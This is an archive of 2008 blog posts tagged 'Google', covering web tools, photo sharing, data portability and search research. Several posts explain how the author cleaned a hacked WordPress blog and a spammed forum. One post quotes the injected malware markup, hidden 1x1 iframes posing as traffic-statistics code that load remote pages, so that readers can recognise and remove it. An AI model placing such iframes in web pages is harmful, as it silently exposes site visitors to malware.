Posts Tagged ‘Google’

Radio2.0 - Last.fm will pay royalties to independent musicians

Saturday, July 12th, 2008

Last.fm, a very cool online radio / music social networking site, just announced that it will pay royalties directly to independent musicians who upload their songs.

This is pretty important, for the same reason that Google’s Adsense was important (though the impact is probably a few orders of magnitude smaller). The Internet does a few things really, really well: it quickly builds network effects, encourages the creation of lots of long tail and niche content, and so on. It also has the potential to cut out the middleman in economic transactions and help pay small-audience writers, artists, and musicians, so long as there’s a viable monetization system.

Adsense is that monetization system for a huge number of web sites, and hopefully things like Last.fm’s royalty program and CDBaby will be the engine that drives more interesting music online.

By the way, I started the Geek Music group a few years ago.  Feel free to join; your listening habits will help us determine the best music to put on when writing code.

Sphere: Related Content

Embedding Google Docs and Spreadsheets into your Blog Posts

Sunday, July 6th, 2008

I just wrote a post about buying a new camera, and because I want to compare specs on several different cameras and lenses, I’m going to need a spreadsheet.  Luckily there are some great online spreadsheet programs to choose from.  I’m going to use this as an opportunity to explore how to use Google Docs and Spreadsheets in blog posts.

Before you get started I’m assuming you already have a Google Docs spreadsheet ready to go.

1.  You can always just link to the document. By default your docs will be private so you’ll need to make them available to your readers.  To do so you’ll need to either go to the Share tab and check “Anyone can view this document WITHOUT LOGGING IN at:” or go to the Publish tab and publish the doc. Either way you’ll get a regular URL to post, like this one:  http://spreadsheets.google.com/ccc?key=ppevxmL24UqmeiZSbqIU1DQ&hl=en

Links aren’t very exciting though, so how can you embed into a post instead?

2.  You can embed the content into the post.  If you’re wondering how to do it in Wordpress, one solution I’ve come across is the Inline Google Docs plugin at Broken Watch.  This plugin gets the actual text/html of the spreadsheet and places it inline in your post.  So if you have a wide blog template, or a spreadsheet with relatively few columns, it should blend right in.  On the other hand, there’s no editing or other fun.

Here’s an example of what the output looks like:

Camera | MPix | Lens | wide | tele | zoom | stabilized / VR | weight (lbs) | lens $ | total (lbs) | total $
Nikon CoolPix 5700 | 5 | - | 35 | 280 | 8 | N | 1.1 | | |
Nikon D40 | 6.1 | | | | | | | $430 | |
Nikon D60 | 10 | 126 x 94 x 64 mm (5.0 x 3.7 x 2.5 in) | | | | | 1.2 | $600 | |
Nikon | | AF-S DX Nikkor 18-135mm f/3.5-5.6G VG | 18 | 135 | 8 | Y | 0.85 | $260 | |
Nikon | | AF-S DX VR Zoom Nikkor 18-200mm f/3.5-5.6G ED-IF | 18 | 200 | 11 | Y | 1.2 | $650 | | | http://www.dpreview.com/lensreviews/nikon_18-200_3p5-5p6_vr_afs_n15/
Nikon | | Tamron 18-250mm F/3.5-6.3 AF Di-II LD Aspherical (IF) Macro Lens | 18 | 250 | 14 | N | 1 | $415 | |
Nikon | | Tamron AF 28-300mm f/3.5-6.3 XR Di LD VC (Vibration Compensation) Aspherical (IF) Macro Auto Focus Zoom Lens | 28 | 300 | 11 | Y | 1.3 | $540 | |
Nikon | | Sigma AF 18-200mm f/3.5-6.3 DC OS (Optical Stabilizer) Zoom Lens | 18 | 200 | 11 | Y | | | |

3.  You can put the doc directly in the page with an iframe. This works really, really well with Google Presentations but is a bit trickier with a doc and even less optimal with a spreadsheet. You’ll get the best-looking results if you publish the document and use the published URL in the iframe. On the other hand if you use the shared URL collaborators should be able to make changes right in your blog post.

You’ll want to create some code like this:

<iframe src="http://spreadsheets.google.com/pub?key=ppevxmL24UqmeiZSbqIU1DQ" width="500" height="400"></iframe>

Make sure you put the code in the “HTML” editing mode of Wordpress rather than “Visual” mode.  As a result you can see some of the info I’ve gathered about possible camera / lens combinations in the spreadsheet below.

The main issue here is the relatively small iframe window size. If you use a wider blog template this technique might work really well.

Why bother? Spreadsheets aren’t the most exciting thing in the world for most people, but play around with all the features of Google Docs and Spreadsheets and you’ll see why this can be pretty cool.  You can embed questionnaires and surveys, cool charts and graphs with Gadgets, and anything else you can think of.


Great video on how to get your site back in Google

Friday, July 4th, 2008

Earlier I wrote a bit about what to do when your site has been hacked or spammed to the point where Google and Firefox start warning visitors away from your site.  If you find your site deleted from Google search results completely, you’ll want to file a reconsideration request.

Luckily, the Google Webmaster Central blog has a great post on how to make a request to get back into Google.  The post includes a step-by-step video.  You can also check out the Google Webmaster Help group if you have questions.


Google Earth vs. Reality, Revisited

Friday, June 6th, 2008

Last week I compared some real-life photos with the same scene in Google Earth.  Since I’m a bit of a computer/mapping/photography geek, I couldn’t resist doing a few more.  That actually ended up being a pretty popular post, with thousands of pageviews, which just goes to show I’m not the only combination computer/mapping/photography geek out there.

Here’s a view of San Francisco from Coit Tower on Telegraph Hill.  Follow this link to see larger versions in Flickr.  This one is even better than the two from last week - look how well the streets, buildings, and Golden Gate Bridge match with the photo.

Google Earth vs. Reality - San Francisco from Coit Tower

Now I’ll go a little more international.  Here’s a photo from the site of ancient Mycenae in Greece.  This is above the famous Lion Gate looking out at the hills surrounding the Argolid plain.  See larger versions in Flickr.  The aerial photograph that Google Earth maps to the topography isn’t as detailed as the real life photo, but even the borders of the olive groves line up.

Google Earth vs. Reality - Mycenae, Greece

These next two are not as identical as the San Francisco cityscapes, but are still impressive because of how well they evoke the real life scenes without 3-d buildings.

The first is from the Acropolis in Athens, looking out over the surrounding neighborhood.  Larger versions in Flickr.

Google Earth vs. Reality - Athens from the Acropolis

Here’s another shot from the Acropolis showing the new Acropolis Museum.  Larger versions in Flickr.

Google Earth vs. Reality - Athens and the new Acropolis Museum

If you feel like making some comparisons of your own, please let me know in the comments below - I’d love to see what other people could come up with.


The Ethics of Web Apps, or, Ever try to get a list of your contacts from Facebook?

Sunday, April 20th, 2008

Jagged path

Even before I worked at Google, I was pretty impressed by the “don’t be evil” motto.  Not that I think any company is perfect or that anyone can hire only saintly employees - but it’s impressive when anyone recognizes the ethical implications of what we do as programmers and web developers.

Now that I work there, I can tell you that everyone really seems to take it to heart (disclaimer:  this is my personal blog and I am not representing my employer in any way).  At this point, you may be asking, “programs are just lists of instructions, web sites are just products, what’s the ethical dilemma?”

I’ll give you an example.

I’m a big fan of Facebook.  I think they’ve really done a great job building a social networking system, and it’s been very useful for keeping up with friends all over the world.  But I also have an account at LinkedIn, and Flickr, and Yelp, and an address book in Thunderbird, and another on my iPhone, and…  you get the picture.  So I’m trying to collect all my contacts together in one system (Gmail) so I can just import/export to keep all these different social networking systems up to date.

But Facebook doesn’t have a function to export a list of contacts and email addresses.  What’s more, they’ve apparently actively blocked attempts by developers to build systems to do it and disabled people’s accounts.

They are, of course, not legally obligated to let you export your contacts.  And if I were building a social networking site, it probably wouldn’t be the first feature I would implement.  But ethically, I think, they should do so.  Why?  We can refer to Kant’s categorical imperative or Jesus’ golden rule:  They should build open systems because they would like other systems to be open.

They certainly take advantage of the openness of other systems, allowing you to import contacts from Gmail.  Google’s social networking site, Orkut, will happily export your contacts, and I don’t think that’s an accident.  The engineers and product managers at Google make conscious choices to do the right thing.

But wait…  am I really asking them to make it easy for their users to take their data and go over to a competitor?  Isn’t that a bad business practice?

It’s possible, but beside the point.  I’m sure you and I could think of plenty of things that are profitable but morally repugnant.  What’s more, I don’t think it is a bad business practice at all.  I think that the walled garden approach is a sign of desperation rather than innovation.  Orkut is not the only one that lets you take your data with you - LinkedIn allows exports, for example.

Paul Graham wrote a really interesting post about this recently:

When you’re small, you can’t bully customers, so you have to charm them. Whereas when you’re big you can maltreat them at will, and you tend to, because it’s easier than satisfying them. You grow big by being nice, but you can stay big by being mean.

If you’d like to read more about this subject and see what some developers are doing to make your data more portable, check out DataPortability.org.


Announcing Localographer: find an apartment or house with Google Maps

Monday, April 7th, 2008

Localographer logo

Earlier I wrote about using Photoshop to create a heat map and about using data maps when house hunting.  I got a pretty good response to those tutorials but the process is a little too labor intensive for most.  So when I moved to California, I decided to do something similar, using the Google Maps API, so that it would be easy for anyone to make their own heat map.

So here it is:  Localographer - build interactive heat maps for house and apartment hunting.  You can see a screenshot below:

Screen shot of a Bay-area heat map from Localographer

Localographer is a beta release right now, so watch out for bugs and random downtime.  Also, I have to add a disclaimer:  this is not an official Google project, this is something I did in my spare time.  In fact, most of the work was done before I started working at Google, in preparation for our move to California.

The site takes you through a series of steps to build your map:

  1. Pick your city and create your map;
  2. Add places you’d like to be near (like your job or your school);
  3. Add potential locations (houses, apartments, condos) to see how they compare.

I’ve got a ton of ideas for additional functionality, so hopefully I’ll have time to add more in the next few weeks.  I’ll also be working on the site’s design, making it a bit more usable and interactive.

Here’s how a map in Localographer compares to my Photoshop heat map of the Cleveland area (click on the images to see larger versions):

Screen shot of a Cleveland-area heat map from Localographer

Heat map we used for house hunting, with hotspots placed at locations we need to drive to

In case you’re interested, the site was developed in PHP with a MySQL database.  The maps use the Google Maps API with some hand-written functions to correctly draw the hot spots.

Please take a look and let me know what you think.  Post any problems, bugs, or new feature ideas in the comments below.  Later I’ll post a poll so you can vote on new features and other enhancements.
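For anyone curious how a heat value for a candidate address could be computed, here is a minimal sketch in Python. It is not the Localographer code (that is PHP, and its hot-spot functions aren't shown here); the linear falloff, the `falloff_km` parameter, and the function names are all assumptions made for illustration. Only the haversine distance formula is standard.

```python
import math

EARTH_RADIUS_KM = 6371.0  # mean Earth radius


def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance between two lat/lon points, in kilometres."""
    phi1, phi2 = math.radians(lat1), math.radians(lat2)
    dphi = math.radians(lat2 - lat1)
    dlam = math.radians(lon2 - lon1)
    a = (math.sin(dphi / 2) ** 2
         + math.cos(phi1) * math.cos(phi2) * math.sin(dlam / 2) ** 2)
    return 2 * EARTH_RADIUS_KM * math.asin(math.sqrt(a))


def heat(candidate, hotspots, falloff_km=10.0):
    """Hypothetical score: each hot spot adds 1.0 at zero distance,
    fading linearly to 0.0 at falloff_km and beyond."""
    lat, lon = candidate
    total = 0.0
    for spot_lat, spot_lon in hotspots:
        distance = haversine_km(lat, lon, spot_lat, spot_lon)
        total += max(0.0, 1.0 - distance / falloff_km)
    return total


# Made-up coordinates: two places you want to be near, two candidate homes.
hotspots = [(37.42, -122.08), (37.44, -122.16)]
candidates = {"apartment A": (37.43, -122.10), "house B": (37.70, -122.40)}
ranked = sorted(candidates, key=lambda name: heat(candidates[name], hotspots), reverse=True)
```

A candidate close to several hot spots scores higher than one close to a single spot, which is roughly what the overlapping colors in the Photoshop version show.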


Fixing a ‘This site may harm your computer’ warning, part 3: Clearing a spammed forum

Saturday, March 22nd, 2008

Sun setting behind a sculpture in the park near Google

Earlier I wrote about the steps you should take if your site has been hacked and is being slapped with a “This site may harm your computer” label. In that post we covered some of the sneaky ways scammers will insert text into your posts on Wordpress and other blog software.

But what if it’s even worse? Let’s say you installed a forum like phpBB to play around with but haven’t been keeping up with security updates. Or, even worse, your ftp account has been compromised and spammers have installed their own bulletin board or other content in a subfolder or subdomain. You don’t want Google and Yahoo thinking you are a spammer, so what do you do?

In that worst-case scenario, you’ll first need to change your passwords and make sure you have control of any and all ftp accounts, telnet accounts, etc. You may need to work with your host to make sure everything is locked down. Web server security is a big topic in its own right, so from here on out we’ll assume you’ve already got that covered.

Step 1 - Delete the spam!

The first thing to do is delete the spammy bulletin board. Go ahead and delete all the contents of the directory. Don’t delete the directory itself quite yet. This does two things - it stops the spammers from getting any benefit from wayward visitors to your site and it causes your web server to start serving 404s (not found) to search engine spiders.

You can go one step further and explicitly tell browsers and spiders that this stuff is gone forever by serving a 410 (gone). You can do this with any server-side language; my example will be in PHP. Create a new index.php file in your formerly-spammed directory that looks like this:

<?php
// Send a 410 so browsers and spiders know this content is gone for good.
header("HTTP/1.1 410 Gone");
header("Status: 410 Gone"); ?>

This will cover the main directory, and then you can use mod_rewrite to send requests for all the deleted pages to your 410 file.

Step 2 - Update your robots.txt

At this point search engine spiders will be able to figure out that the pages should be removed from their indexes, but only one page at a time as they re-crawl your site. You want it out of there ASAP, so create a robots.txt entry to tell spiders to stay away from the whole directory. It should look something like this:

User-agent: *
Disallow: /forum/

If the spam was in a subdomain, you’ll need to make sure you have a robots.txt file in the root directory of the subdomain that disallows the whole thing:

User-agent: *
Disallow: /
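Before you upload the file, you can sanity-check that the rules block what you expect. Here is a minimal sketch using Python's standard `urllib.robotparser` module; the `is_blocked` helper and the example.com URLs are my own placeholders, not part of any tool mentioned in this post.

```python
from urllib.robotparser import RobotFileParser


def is_blocked(robots_txt: str, url: str, user_agent: str = "*") -> bool:
    """Return True if these robots.txt rules tell user_agent not to fetch url."""
    parser = RobotFileParser()
    parser.parse(robots_txt.splitlines())
    return not parser.can_fetch(user_agent, url)


# The two rule sets from this step.
FORUM_RULES = """\
User-agent: *
Disallow: /forum/
"""

SUBDOMAIN_RULES = """\
User-agent: *
Disallow: /
"""

# Placeholder URLs; swap in your own site and spammed paths.
forum_blocked = is_blocked(FORUM_RULES, "http://example.com/forum/viewtopic.php?t=1")
blog_blocked = is_blocked(FORUM_RULES, "http://example.com/blog/")
subdomain_blocked = is_blocked(SUBDOMAIN_RULES, "http://forum.example.com/index.php")
```

The forum URL should come back blocked and the blog URL should not. If the blog is blocked too, the Disallow line is broader than you meant.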

Step 3 - Tell Google about the spam

Log in to Google Webmaster Tools and look under Tools -> Remove URLs.  Create a new removal request for the subdirectory or subdomain you’ve cleaned.  This might seem a little redundant, since you’ve already done two steps that will let search engines know you’re no longer serving up spam.  But it’s worth being as explicit as possible to get your site’s reputation cleared as quickly as possible.

Bonus tip:  Subdomains and Google Webmaster Tools

If your spammed forum was in a subdomain, let’s say http://forum.example.com, you’ll need to add the subdomain as a new site in Google Webmaster Tools.  You’ll need to go through the site verification process for the subdomain, too - it won’t verify automatically the way it would if you had added a subdirectory as a new site.

By the way, if you’d like some more tips about keeping your site clean and tidy, check out this great post on the Google Webmaster Central Blog.

Any questions? Comments?  Tips that I’ve missed?  Please post in the comments section below.


Fixing a ‘This site may harm your computer’ warning, part 2: Hidden iFrames

Thursday, March 6th, 2008

Earlier I wrote about what I did when my Wordpress blog started returning a “This site may harm your computer” warning in Google and Firefox. Just to recap, these are the first steps to take to fix the problem:

  1. Plug the hole - update Wordpress (or your blog, forum, or CMS software) to plug any security holes.
  2. Repair the damage - search for spammy outgoing links or malware files on your pages and delete them.
  3. Clear your good name - request a review by StopBadware.org and in Google Webmaster Tools.

This is the right process to follow, but it turns out that I was a bit premature in doing step 3. Spammers and spyware spreaders are a wily, unpredictable bunch and they can’t be expected to stick to simple tactics like inserting links into posts.

The other tactic they used on my site was inserting invisible iFrames. These are harder to find because there aren’t as many automated tools to find them (or, at least, I don’t know of any) so it takes some manual searching through your source code. Here’s what the malware code looked like:


<!-- Traffic Statistics --> <iframe src=http://www.wp-stats-php.info/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe> <!-- End Traffic Statistics -->

<noscript></noscript> <iframe src="http://61.132.75.71/iframe/wp-stats.php" frameborder="0" height="1" width="1"></iframe><br />
<!-- End Traffic Statistics -->

It looks like others have run into the same issue. Your anti-virus software may even give you a warning about a virus in a file named “wp-stats[1].htm.” In my case AVG Anti-Virus warned me about a trojan horse in my temp folder.
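If you would rather not search by eye, a short script can flag the kind of iframe shown above. This is a minimal sketch using Python's standard `html.parser`; it assumes you have the page source as a string (saved from your browser, for example), and the names `TinyIframeFinder` and `find_hidden_iframes` are made up for this example. It only catches iframes sized 0 or 1 pixel through the width or height attributes, so one hidden with CSS would slip past it.

```python
from html.parser import HTMLParser


class TinyIframeFinder(HTMLParser):
    """Collect the src of every iframe whose width or height is 0 or 1."""

    def __init__(self):
        super().__init__()
        self.suspects = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        attributes = dict(attrs)
        sizes = (attributes.get("width"), attributes.get("height"))
        # An attribute with no value is reported as None, so guard for that.
        if any(size is not None and size.strip() in ("0", "1") for size in sizes):
            self.suspects.append(attributes.get("src"))


def find_hidden_iframes(html: str):
    """Return the src values of suspiciously tiny iframes in html."""
    finder = TinyIframeFinder()
    finder.feed(html)
    finder.close()
    return finder.suspects


page = (
    "<p>A normal post.</p>"
    "<!-- Traffic Statistics --> "
    "<iframe src=http://www.wp-stats-php.info/iframe/wp-stats.php "
    "width=1 height=1 frameborder=0></iframe>"
)
suspects = find_hidden_iframes(page)
```

Anything it reports still needs a human look, since a tiny iframe isn't proof of malware, but it narrows down where to start.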

Once I removed the iframes, I resubmitted my request in Google Webmaster Tools. Here’s another helpful hint that took me a while to figure out: If only part of your site has been hacked and is marked in StopBadware.org’s database, you should add that subdirectory as a new site in Webmaster Tools. Here’s an illustration (click to see full size):

webmaster-tools-subdir

In this screenshot you can see my main site, www.jasonmorrison.net. If I click there I don’t see any warning about spam or viruses in my blog at www.jasonmorrison.net/content. So I just added my blog as a new “site” and there I could see the warnings and make a reconsideration request.

One last thing: Google may send out an email to try to let you know about these sorts of problems. I never saw these emails, though, since they go to addresses like abuse@yourdomain.com and admin@yourdomain.com that spammers also like to use. They ended up in my spam bucket. So you might want to whitelist email from google.com.

Next in part three I’ll talk about what to do when a whole subdomain (perhaps with a forum) is filled with spam. Please put questions or additional suggestions in the comments below.


What I did when my site showed up as a bad link

Wednesday, February 27th, 2008

This site is just a humble blog where I write a bit about programming, design, usability, and other topics I’m interested in. It’s nice that I get some readership and a few good comments now and again but I don’t have any real financial stake here, and I’m definitely not interested in trying to spam anyone, send them spyware, etc. So imagine my shock when I noticed that my blog comes up with a warning, “This site may harm your computer.”

This comes up in various places including Firefox 3 and Google searches.  Obviously no one is going to follow a link to my site with such a disclaimer. So where did it come from and what did I do to clear my site’s good name?

The disclaimer comes from the findings of StopBadware.org, an effort that I had heard about in the past but hadn’t really looked into. It sounds like a great idea - it’s very difficult for users to investigate every single link they might click on, and some spyware and adware is hard to see before it’s too late. So StopBadware.org is a sort of neighborhood watch for the web.

How did my site end up on the list? There are a number of possibilities, so the first step is to check StopBadware.org to see what they found. Follow this link to search for your URL. Make sure you search for your root domain, in my case jasonmorrison.net. Some subdomains or directories might show up with a report while others are still considered clean. This confused me for a while.

Once you see the details there it’s time to hunt for problems. If you have anything more than a simple, static site this can be more difficult than it might first seem. My site uses Wordpress and allows user comments. A bad link could show up in a comment, or someone may have hacked the site using a known vulnerability. It looks like it was the latter in my case, but I’m getting ahead of myself. How do you find the bad link?

There are lots of tools to find incoming links to your site, but I’ve only found one so far that checks outgoing links, at Bad Neighborhood. Don’t blindly rely on this tool, but follow up on any links that you don’t recognize having put there yourself. I found a link in the middle of a post from a month or so ago to some spammy German site.
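If you want a second opinion alongside a tool like that, listing a page's outgoing links yourself is not hard. Here is a minimal sketch in Python using only the standard library; it assumes you already have the page's HTML as a string, and the names `LinkCollector` and `outgoing_links` plus the spam URL are invented for the example.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse


class LinkCollector(HTMLParser):
    """Collect the href of every <a> tag."""

    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            href = dict(attrs).get("href")
            if href:
                self.hrefs.append(href)


def outgoing_links(html: str, own_host: str):
    """Return links that point somewhere other than own_host or its subdomains."""
    collector = LinkCollector()
    collector.feed(html)
    collector.close()
    external = []
    for href in collector.hrefs:
        host = urlparse(href).hostname  # None for relative links like /about
        if host and host != own_host and not host.endswith("." + own_host):
            external.append(href)
    return external


page = (
    '<a href="/about">About</a> '
    '<a href="http://www.jasonmorrison.net/content/">Blog</a> '
    '<a href="http://spam.example.de/pills">cheap pills</a>'
)
external = outgoing_links(page, "jasonmorrison.net")
```

The output is just a list to read through. The useful part is the same as with the online tool: follow up on any link you don't remember adding.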

How did the link get there? I don’t think my site was hacked wholesale (or if it was, they were very subtle about it). More likely someone took advantage of my laziness in upgrading Wordpress and used a known security exploit.

Now that we’ve found and removed the offending link and plugged any known security holes, it’s time to try to get the stigma removed. Follow the link to the StopBadware.org request for review page and fill out a request. If the badware report came from one of their partners, you may have to follow up with them as well. I’m still waiting to hear back on my review; I’ll post an update when I know more.

Hopefully this has been helpful. Let me know if you have any questions or suggestions in the comments below.


Why I am sharing my photos with a Creative Commons License

Wednesday, February 13th, 2008

I do a bit of amateur photography.  I’m not very strong technically and I don’t have particularly good equipment, but I enjoy finding interesting angles and compositions.  I’ve been putting up photos on Flickr for a while to share them with friends and the public.  I also have an account on Panoramio with some photos that show up in Google Earth.

No matter the particular photo site used, sharing photos online has been a great experience.  I’ve had a number of encouraging comments on my photos and people have emailed me to ask if they could use a photo in a report for school or a pamphlet for their non-profit.

When I signed up with Flickr I noticed they had options to add Creative Commons licenses to photos by default.  I’m more than happy to let people use my photos for noncommercial purposes, so why didn’t I turn on Creative Commons licensing from the start?

Part of it was the number of options available.  Creative Commons licensing allows other people to share your work but it’s not the same thing as releasing the copyright or putting photos in the public domain.  You have some options:  do you want people to be able to make money off your work, or do you just want it available for non-profits, educational, and personal use?  Do you want people to be able to alter and remix your work or just present it as-is?

So I was a bit struck by the paradox of choice and decided to skip ahead and start uploading photos.  In retrospect, that was a mistake.

There’s a great page at the Creative Commons site that explains the options.  I am going to license my photos with an Attribution Non-commercial (by-nc) license.  That license covers my default attitude about my amateur photography - everyone is welcome to use my photos for non-commercial purposes, so long as they give me credit. This is, of course, in addition to fair use rights that people already have.

Another important point:  it doesn’t mean people can’t use it commercially, they just have to contact me and get permission.  Depending on the use, I might put a price on it.  And I can always sell prints or make products myself.

I might even switch over to allow commercial use as well, if I can get over my delusions of being the next Ansel Adams.

San Francisco skyline and flowers

The abuse and incessant extension of copyright might not seem like a life-or-death issue, but it’s one of those issues where technology and public policy are inextricably linked.  It’s like the problem of software and business method patents.  There’s a great story by Spider Robinson that illustrates what happens if taken to extremes.

So take a look at the licenses and consider applying the appropriate copyleft to your work.


The iPhone, Google Maps for Mobile, and e911 - where is the disconnect?

Wednesday, November 28th, 2007

Google Maps for Mobile will soon include a GPS-like ability to find your current location.  A little while ago Gizmodo wrote about an iPhone hack that allows almost, but not quite, GPS functionality.  The hack itself sounds a lot like the way phase II of the wireless E911 service works, and my guess is that Google Maps is fairly similar.

If you take a look at this map, you can see that many states have > 80% deployment.  On the FCC site you can find reports of the E911 deployments completed by cell phone companies.  Any company that doesn’t have over 95% of their customers with E911 capable handsets is currently getting fined.  So it’s a shame that Google and random iPhone hackers have to reimplement all this.

I’ve never worked on E911 support (or anything cellular, for that matter), but it seems to me there is an incredible opportunity here.  One of the great things about the iPhone is that it drives adoption of data plans.  How about including pseudo-GPS capability in nearly every phone as soon as you sign up for a data plan?  That would be a huge incentive.

Here’s an even more radical idea:  why not come up with a standard way to communicate presence and location data so users can do things like local search?  It might take us years and millions of dollars to develop proprietary systems to do this, but if we use an open standard perhaps this could be adopted as quickly as things like the web and email.

Even better, operating under an open standard will allow geeks in garages all over the world to develop new social software systems we can’t even dream of.


Picasa vs. iPhoto vs. Flickr vs. Panoramio

Sunday, June 17th, 2007

Ledges along Doan Brook in Cleveland

Earlier I mentioned that I have some photos uploaded to Panoramio. I’ve also played with Flickr off and on, and have recently started uploading some photos there as well. To add to the confusion, I use Picasa to manage photos on my hard drive, and my wife uses iPhoto on her Mac. Picasa has a web albums feature, and I’m sure iPhoto has something similar with a .Mac account.

Why use four different services that overlap each other to such a degree? Picasa and iPhoto both do the important job of managing photos locally, Flickr seems to have the largest community and the most widgets written for it, and Panoramio integrates with Google Earth. Since I want to do all those things, I have to use them all.

There are ways to make them play nice together. You can use a Gmail account to email photos from Picasa to Flickr, and so far it seems to work fairly well. There are a few iPhoto plugins to upload to Flickr and you can use iPhoto to subscribe to Flickr photostreams. Google just bought Panoramio, so I’m sure there will be more integration there soon as well.

Even with all these options, there are some annoyances. Picasa’s keyword tagging is not very useful because it only allows one-word tags. I tried creating multi-word tags with dashes or by enclosing them in quotes, but Picasa ate the special characters. There’s also the complication of managing public photos vs private photos.

Still, it is amazing how well these different websites and programs work together, through the magic of RSS, web APIs, and plain old email.

If you’d like, you can see my Flickr photos here. You can also see my photos in Panoramio, or just look close enough in Google Earth, since a few of my photos now show up there.


Notes: Why are online catalogs still hard to use?

Wednesday, June 22nd, 2005

Borgman, C.L. (1996). Why are online catalogs still hard to use? Journal of the American Society for Information Science, 47 (7): 493-503. 

In this 1996 study, Borgman revisits a 1986 study of online library catalogs. In the original study, computer interfaces and online catalogs were still fairly new—the study looked at how the design of traditional card catalogs could inform the design of new online catalogs. By the time of this study online catalogs were common but still not easy to use. Three kinds of knowledge were seen as necessary for online catalog searching: conceptual knowledge about the information retrieval process in general, semantic knowledge of how to query the particular system, and technical knowledge including basic computer skills. Semantic knowledge and technical knowledge differ here in the same way as semantic and syntactic knowledge in computer science. The study also covers specific concepts like action, access points, search terms, boolean logic, and file organization. In the short term, Borgman recommends training and help facilities to help users gain the skills they need to use current systems. In the long run, though, libraries must employ the findings of information-seeking process research if they are ever going to create usable interfaces.

The study does point out a number of reasons why online catalogs are difficult for users, whether it’s because they lack computer skills or semantic knowledge. One good example is from a common type of query language. Even if the user knows that “FI” means “find” and “AU” means author, they may not know whether to use “FI AU ROBERT M. HAYES,” “FI AU R M HAYES,” “FI AU HAYES, ROBERT M,” etc., and how the results will differ. Unfortunately the article lacks clear instructions or examples of how to make the systems better. The conclusion that different types of training materials could be helpful seems to me like a bandage rather than a cure.

I think a lot of the criticisms are still true, but that modern cataloging and searching systems have become easier. I’m not so sure it’s because catalog designers have started applying information-seeking research in their interfaces, though. It almost seems like library systems are being made easier in self-defense. Users are getting more and more used to a Google or Yahoo type interface: a simple search box that looks at full text and uses advanced algorithms to find relevant results. I think part of this is due to the fact that people in the library field have experience with complicated, powerful structured search systems and are used to a lot of manual encoding of records. Web developers, lacking this background, have been more free to think in terms of searching massive amounts of unstructured data and automating the collection and indexing process. I also think that simple things such as showing the results, including summaries of each item, in a scrollable, clickable list, have helped a great deal to support the information seeking process. Things like search history and “back” and “forward” buttons, “search within these results,” automatic spell checking, etc. are becoming pretty standard as well.


Notes: Helping people find what they don’t know

Tuesday, June 14th, 2005

Nicolas J. Belkin, Helping people find what they don’t know, Communications of the ACM, v.43 n.8, p.58-61, Aug. 2000

In this article, Belkin argues that people generally start searching for information when they don’t know much about a subject. It is therefore problematic that many search systems require knowledge of the domain in order to get good results, for example when users do not know either the specific keywords or controlled vocabulary of the system. His group feels that the best way around this is for the system to make suggestions along the way. There are two techniques that can be used: system-controlled, where the user’s query is enhanced automatically by the system using algorithms like word frequency, and user-controlled, where the user is given the results of their query along with suggestions to make it more effective. The author’s team found that suggestions were most effective when the user was able to control which suggestions were used and when the user knew how the suggestions were generated and was comfortable with the results.

The author’s findings seem both intuitive and promising. It makes sense that in an interactive structured searching system giving the user suggestions and allowing them to take them or leave them would work well, and the suggestions should be neither bizarre nor mysterious. But with the rise of the World Wide Web, I think it’s pretty clear that users with less domain knowledge prefer less-structured searching environments. In my experience, users who are new to a system will type unstructured, keyword queries into anything that even looks like a search box, even if it is clearly labeled as a field for author name, product code, or start date. Power users, on the other hand, often have more knowledge about the data than the system’s programmers, so for these sorts of suggestions to be useful, the algorithm would need to do more than just call up synonyms. The article makes it clear that these findings are early, so I would be interested to see what they have come up with since 2000.

These ideas could be applied to both structured and unstructured searching environments, though my guess is that they would be easier to implement in more structured environments because the structure of the system can be used to generate the suggestions. There certainly have been a number of projects which have tried to provide something like this with general web searching. Rudimentary systems like Google Suggest or more advanced ones like Teoma show off the potential. Notice, however, that neither of these has exactly taken the search engine industry by storm, meaning people are apparently happy to muddle along with plain keyword searching and advanced ranking algorithms. I do wonder if their finding that users liked to have some idea about how suggestions were found would apply here as well: would users be happier with Google if they were told why PageRank picked a certain site as the number one result? Since the algorithms used by Google, Yahoo, MSN and others are trade secrets I doubt we’ll see anything like that in the near future. On the other hand, Amazon.com’s recommendation engine does tell the user why a certain book was suggested, and allows the user to remove certain suggestions. Although it is not really a search tool, it follows the precepts discussed here and seems to be successful.
